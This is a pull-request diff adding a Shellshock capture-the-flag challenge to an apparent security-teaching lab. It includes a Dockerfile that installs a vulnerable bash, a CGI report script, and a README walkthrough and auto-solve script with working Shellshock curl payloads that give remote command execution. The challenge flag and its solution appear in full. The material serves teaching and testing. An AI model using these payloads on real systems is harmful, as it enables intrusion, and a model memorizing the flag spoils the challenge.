Merge pull request #20 from stratosphereips/martin/shockwave-report

Martin/shockwave report

challenges/shockwave-report/Dockerfile

@@ -0,0 +1,28 @@
+FROM httpd:2.4
+
+# Environment
+ENV DEBIAN_FRONTEND noninteractive
+ENV LANG C.UTF-8
+ENV LANGUAGE C.UTF-8
+ENV LC_ALL C.UTF-8
+
+RUN apt-get update -y && apt-get dist-upgrade -y
+
+# Install wget and a library needed for the vulnerable bash
+RUN apt-get install -y wget libtinfo5 procps
+
+# Install vulnerable bash version from wayback/snapshot archive
+RUN wget http://snapshot.debian.org/archive/debian/20130101T091755Z/pool/main/b/bash/bash_4.2%2Bdfsg-0.1_amd64.deb -O /tmp/bash_4.2+dfsg-0.1_amd64.deb && \
+ dpkg -i /tmp/bash_4.2+dfsg-0.1_amd64.deb
+
+# Setup cgi capabilities for httpd
+COPY httpd.conf /usr/local/apache2/conf/httpd.conf
+
+# Setup cgi script
+COPY report.sh /usr/local/apache2/cgi-bin/report
+RUN chmod a+x /usr/local/apache2/cgi-bin/report
+
+# Copy the index that points to the cgi script
+COPY index.html /usr/local/apache2/htdocs/index.html
+
+EXPOSE 80

challenges/shockwave-report/README.md

@@ -0,0 +1,132 @@
+# Shockwave Report
+
+This challenge deploys a machine vulnerable to shellshock. 
+
+### Task
+
+A user must find HTTP endpoint that reports various system information via cgi-script including a bash version, discover
+that the bash version is vulnerable to shellshock and exploit the script to pwn the system.
+
+
+
+## How to solve
+<details>
+  <summary>Click to reveal how to solve steps</summary>
+
+1. The task reveals IP address `172.20.0.39`. Let's nmap it:
+```bash
+root@hackerlab:~# nmap -n -v 172.20.0.39
+Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-09 07:18 UTC
+Initiating ARP Ping Scan at 07:18
+Scanning 172.20.0.39 [1 port]
+Completed ARP Ping Scan at 07:18, 0.06s elapsed (1 total hosts)
+Initiating SYN Stealth Scan at 07:18
+Scanning 172.20.0.39 [1000 ports]
+Discovered open port 80/tcp on 172.20.0.39
+Completed SYN Stealth Scan at 07:18, 0.05s elapsed (1000 total ports)
+Nmap scan report for 172.20.0.39
+Host is up (0.0000070s latency).
+Not shown: 999 closed tcp ports (reset)
+PORT   STATE SERVICE
+80/tcp open  http
+MAC Address: 02:42:AC:14:00:27 (Unknown)
+
+Read data files from: /usr/bin/../share/nmap
+Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
+           Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.032KB)
+```
+
+It can be also scanned with version, and it will reveal `80/tcp open  http    Apache httpd 2.4.62 ((Unix))`. However, the vulnerability to exploit is not related to this version of Apache.
+
+2. We find HTTP port 80. In the hints of the challenge it says it is a 'reporting' service.
+
+   So it is possible to try to get `curl http://172.20.0.39/reporting` but it will give Not Found.
+
+   Or also curl `http://172.20.0.39/report`, which should give a webpage.
+
+```bash
+root@hackerlab:~# curl 172.20.0.39
+<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
+<html><head>
+<title>404 Not Found</title>
+</head><body>
+<h1>Not Found</h1>
+<p>The requested URL was not found on this server.</p>
+</body></html>
+
+
+root@hackerlab:~# curl 172.20.0.39/index.html
+<!DOCTYPE html>
+<html>
+<head>
+    <meta http-equiv="refresh" />
+    <title>Redirecting...</title>
+</head>
+<body>
+    <p>If you are not redirected, <a href="/report">click here</a>.</p>
+</body>
+</html>
+
+
+root@hackerlab:~# curl 172.20.0.39/report    
+<html><body>
+<h1>System Information Report</h1>
+<p><strong>Server Uptime:</strong>  07:19:28 up 31 min,  0 user,  load average: 1.01, 1.65, 1.45</p>
+<p><strong>Disk Usage:</strong></p>
+<pre>Filesystem                     Size  Used Avail Use% Mounted on
+overlay                        914G  347G  522G  40% /
+tmpfs                           64M     0   64M   0% /dev
+shm                             64M     0   64M   0% /dev/shm
+/dev/mapper/whatever--vg-root  914G  347G  522G  40% /etc/hosts
+tmpfs                           16G     0   16G   0% /proc/asound
+tmpfs                           16G     0   16G   0% /proc/acpi
+tmpfs                           16G     0   16G   0% /sys/firmware
+tmpfs                           16G     0   16G   0% /sys/devices/virtual/powercap</pre>
+<p><strong>Memory Usage:</strong></p>
+<pre>               total        used        free      shared  buff/cache   available
+Mem:           31831        6686       17877         700        8426       25144
+Swap:            975           0         975</pre>
+<p><strong>Currently Logged In Users:</strong></p>
+<pre></pre>
+<p><strong>Top 5 Processes by CPU Usage:</strong></p>
+<pre>    PID    PPID CMD                         %MEM %CPU
+      1       0 httpd -DFOREGROUND           0.0  0.0
+     64       1 httpd -DFOREGROUND           0.0  0.0
+      8       1 httpd -DFOREGROUND           0.0  0.0
+     36       1 httpd -DFOREGROUND           0.0  0.0
+    109      64 /bin/bash /usr/local/apache  0.0  0.0</pre>
+<p><strong>Network Configuration:</strong></p>
+<pre></pre>
+<!-- Debug Info: Bash Version: GNU bash, version 4.2.37(1)-release (x86_64-pc-linux-gnu) -->
+<p><strong>Diagnostic Mode Disabled:</strong> Enable diagnostics by setting DEBUG=true in the environment.</p>
+</body></html>
+```
+3. Among other information, the user should notice leaked bash version `GNU bash, version 4.2.37`. Google reveals that this
+bash version is vulnerable to shellshock. Shellshock PoC can be then found online and used for RCE to find a flag.
+```bash
+root@hackerlab:~# curl -s -A "() { :; }; echo \"Content-type: text/plain\"; echo; /bin/ls" 172.20.0.39/report 
+printenv
+printenv.vbs
+printenv.wsf
+report
+test-cgi
+root@hackerlab:~# curl -s -A "() { :; }; echo \"Content-type: text/plain\"; echo; /bin/cat report" 172.20.0.39/report 
+#!/bin/bash
+
+# oh no, you found me :(
+# BSY{cIAXNcTzjPEkH5nZU1LV6uPrSIvHpGPEoApUQXfkyftsZOmnsUokQeUfDmEW}
+
+echo "Content-type: text/html"
+echo
+...
+```
+
+
+
+
+
+</details>
+
+## Testing
+
+The script [auto-solve.sh](./auto-solve.sh) automatically verifies that the challenge can be solved.

challenges/shockwave-report/auto-solve.sh

@@ -0,0 +1,37 @@
+#!/bin/bash
+
+MATCH=`curl -s "172.20.0.39/index.html" | \
+       grep -o 'href="/report"'`
+if [[ "$MATCH" == "" ]]
+then
+    echo "Error - index.html does not contain redirection to /report page"
+    exit 1
+fi
+
+MATCH=`curl -s "172.20.0.39/report"`
+if [[ "$MATCH" == "" ]]
+then
+    echo "Error - /report endpoint does not return bash version 'GNU bash, version 4.2.37'"
+    exit 2
+fi
+
+MATCH=`curl -s -A "() { :; }; echo \"Content-type: text/plain\"; echo; /bin/cat report" 172.20.0.39/report | \
+       grep -o "BSY{cIAXNcTzjPEkH5nZU1LV6uPrSIvHpGPEoApUQXfkyftsZOmnsUokQeUfDmEW}"`
+if [[ "$MATCH" == "" ]]
+then
+    echo "Error - shell shock exploit to read the report bash script did not return a flag"
+    exit 3
+fi
+
+# submit a flag in the submission server
+RES=`curl -s 'http://172.20.0.3/api/challenges/submit' \
+    -X POST \
+    -H 'Content-Type: application/json' \
+    --data-binary '{"challenge_id": "shockwave-report", "task_id": "task1", "flag" : "BSY{cIAXNcTzjPEkH5nZU1LV6uPrSIvHpGPEoApUQXfkyftsZOmnsUokQeUfDmEW}"}'`
+
+if [[ $RES != *"Congratulations"* ]]; then
+  echo "Failed to submit the flag - $RES"
+  exit 4
+fi
+
+echo "OK - tests passed"

challenges/shockwave-report/docker-compose.yml

@@ -0,0 +1,21 @@
+version: '3.3'
+
+services:
+  shockwave-report:
+    container_name: shockwave-report
+    stop_grace_period: 0s
+    build: .
+    platform: linux/amd64
+    networks:
+      playground-net:
+        ipv4_address: 172.20.0.39
+    healthcheck:
+      test: ["CMD", "python", "-c", "'import requests; response = requests.get(\"http://localhost/\"); assert response.status_code == 200'"]
+      interval: 30s
+      timeout: 10s
+      retries: 3
+      start_period: 10s
+
+networks:
+  playground-net:
+    external: true

challenges/shockwave-report/httpd.conf

@@ -0,0 +1,80 @@
+ServerRoot "/usr/local/apache2"
+
+Listen 80
+
+LoadModule mpm_event_module modules/mod_mpm_event.so
+LoadModule authn_file_module modules/mod_authn_file.so
+LoadModule authn_core_module modules/mod_authn_core.so
+LoadModule authz_host_module modules/mod_authz_host.so
+LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
+LoadModule authz_user_module modules/mod_authz_user.so
+LoadModule authz_core_module modules/mod_authz_core.so
+#LoadModule access_compat_module modules/mod_access_compat.so
+#LoadModule auth_basic_module modules/mod_auth_basic.so
+LoadModule reqtimeout_module modules/mod_reqtimeout.so
+#LoadModule filter_module modules/mod_filter.so
+#LoadModule mime_module modules/mod_mime.so
+LoadModule log_config_module modules/mod_log_config.so
+LoadModule env_module modules/mod_env.so
+#LoadModule headers_module modules/mod_headers.so
+LoadModule setenvif_module modules/mod_setenvif.so
+#LoadModule version_module modules/mod_version.so
+LoadModule unixd_module modules/mod_unixd.so
+#LoadModule status_module modules/mod_status.so
+#LoadModule autoindex_module modules/mod_autoindex.so
+#LoadModule cgid_module modules/mod_cgid.so
+LoadModule cgi_module modules/mod_cgi.so
+#LoadModule dir_module modules/mod_dir.so
+LoadModule alias_module modules/mod_alias.so
+ScriptAlias "/cgi-bin/" "/usr/local/apache2/cgi-bin/"
+
+<IfModule unixd_module>
+#
+# If you wish httpd to run as a different user or group, you must run
+# httpd as root initially and it will switch.
+#
+# User/Group: The name (or #number) of the user/group to run httpd as.
+# It is usually good practice to create a dedicated user and group for
+# running httpd, as with most system services.
+#
+User daemon
+Group daemon
+</IfModule>
+
+ServerAdmin [email protected]
+ServerName localhost
+
+ErrorLog /proc/self/fd/2
+
+<IfModule mpm_event_module>
+    StartServers             1
+    MaxConnectionsPerChild   0
+    ServerLimit              3
+</IfModule>
+
+# LogLevel: Control the number of messages logged to the error_log.
+# Possible values include: debug, info, notice, warn, error, crit,
+# alert, emerg.
+LogLevel warn
+
+<IfModule log_config_module>
+    LogFormat "%{%FT%T}t.%{msec_frac}t%{%z}t %m %U %>s %b %D %h" format
+    CustomLog /proc/self/fd/1 format
+</IfModule>
+
+DocumentRoot "/usr/local/apache2/htdocs"
+<Directory "/usr/local/apache2/htdocs">
+    Require all granted
+</Directory>
+
+<IfModule alias_module>
+    AliasMatch "^/([^\.]+)\.([^\.]+)$" "/usr/local/apache2/htdocs/$1.$2"
+    ScriptAliasMatch "^/([^\.]+)" "/usr/local/apache2/cgi-bin/$1"
+    ScriptAlias "/" "/usr/local/apache2/cgi-bin/default"
+</IfModule>
+
+<Directory "/usr/local/apache2/cgi-bin">
+    AllowOverride None
+    Options None
+    Require all granted
+</Directory>

challenges/shockwave-report/index.html

@@ -0,0 +1,10 @@
+<!DOCTYPE html>
+<html>
+<head>
+    <meta http-equiv="refresh" />
+    <title>Redirecting...</title>
+</head>
+<body>
+    <p>If you are not redirected, <a href="/report">click here</a>.</p>
+</body>
+</html>

challenges/shockwave-report/meta.json

@@ -0,0 +1,14 @@
+{
+    "name": "Shockwave Report",
+    "id": "shockwave-report",
+    "difficulty": "medium",
+    "description": "Monitoring system resources is important",
+    "tasks": [
+      {
+        "id": "task1",
+        "name": "DIY reporting",
+        "description": "Someone created a custom reporting service at a machine with IP address 172.20.0.39. Was it a good idea?",
+        "flag": "BSY{cIAXNcTzjPEkH5nZU1LV6uPrSIvHpGPEoApUQXfkyftsZOmnsUokQeUfDmEW}"
+      }
+    ]
+  }  

challenges/shockwave-report/report.sh

@@ -0,0 +1,49 @@
+#!/bin/bash
+
+# oh no, you found me :(
+# BSY{cIAXNcTzjPEkH5nZU1LV6uPrSIvHpGPEoApUQXfkyftsZOmnsUokQeUfDmEW}
+
+echo "Content-type: text/html"
+echo
+
+# Simulate system diagnostics output
+echo "<html><body>"
+echo "<h1>System Information Report</h1>"
+
+# Print the server's uptime
+echo "<p><strong>Server Uptime:</strong> $(uptime)</p>"
+
+# Show the current disk usage
+echo "<p><strong>Disk Usage:</strong></p>"
+echo "<pre>$(df -h)</pre>"
+
+# Show memory usage
+echo "<p><strong>Memory Usage:</strong></p>"
+echo "<pre>$(free -m)</pre>"
+
+# Display current users
+echo "<p><strong>Currently Logged In Users:</strong></p>"
+echo "<pre>$(who)</pre>"
+
+# Show active processes (top 5 CPU consumers)
+echo "<p><strong>Top 5 Processes by CPU Usage:</strong></p>"
+echo "<pre>$(ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%cpu | head -6)</pre>"
+
+# Show network configuration
+echo "<p><strong>Network Configuration:</strong></p>"
+echo "<pre>$(ifconfig)</pre>"
+
+# A hidden vulnerability: output Bash version, masked in a comment to avoid immediate detection
+# This is where the vulnerability lies (Bash is processing environment variables)
+echo "<!-- Debug Info: Bash Version: $(/bin/bash --version | head -n 1) -->"
+
+# Simulate more complex behavior with conditional logic
+if [ -z "$DEBUG" ]; then
+    echo "<p><strong>Diagnostic Mode Disabled:</strong> Enable diagnostics by setting DEBUG=true in the environment.</p>"
+else
+    echo "<p><strong>Diagnostic Mode Enabled:</strong> Printing additional debug information.</p>"
+    echo "<pre>$(dmesg | tail -n 10)</pre>"
+fi
+
+# End of the HTML output
+echo "</body></html>"

docs/development.md

@@ -45,6 +45,7 @@
 | playground-net | `172.20.0.10` | Challenge [Famous Quotes LFI](./../challenges/famous-quotes-lfi/)   |
 | playground-net | `172.20.0.30` | Challenge [What's the date?](./../challenges/what-is-the-date/)     |
 | playground-net | `172.20.0.35` | Challenge [What's that noise?](./../challenges/what-is-that-noise/) |
+ | playground-net | `172.20.0.39` | Callenge [Shockwave Report](./../challenges/shockwave-report)       |
  | playground-net | `172.20.0.88` | [Class02](./../classes/class02)                                     |                                                
  | playground-net | `172.20.0.90` | [Class03](./../classes/class03)                                     |                                                
  | playground-net | `172.20.0.95` | [Class03](./../classes/class03)                                     |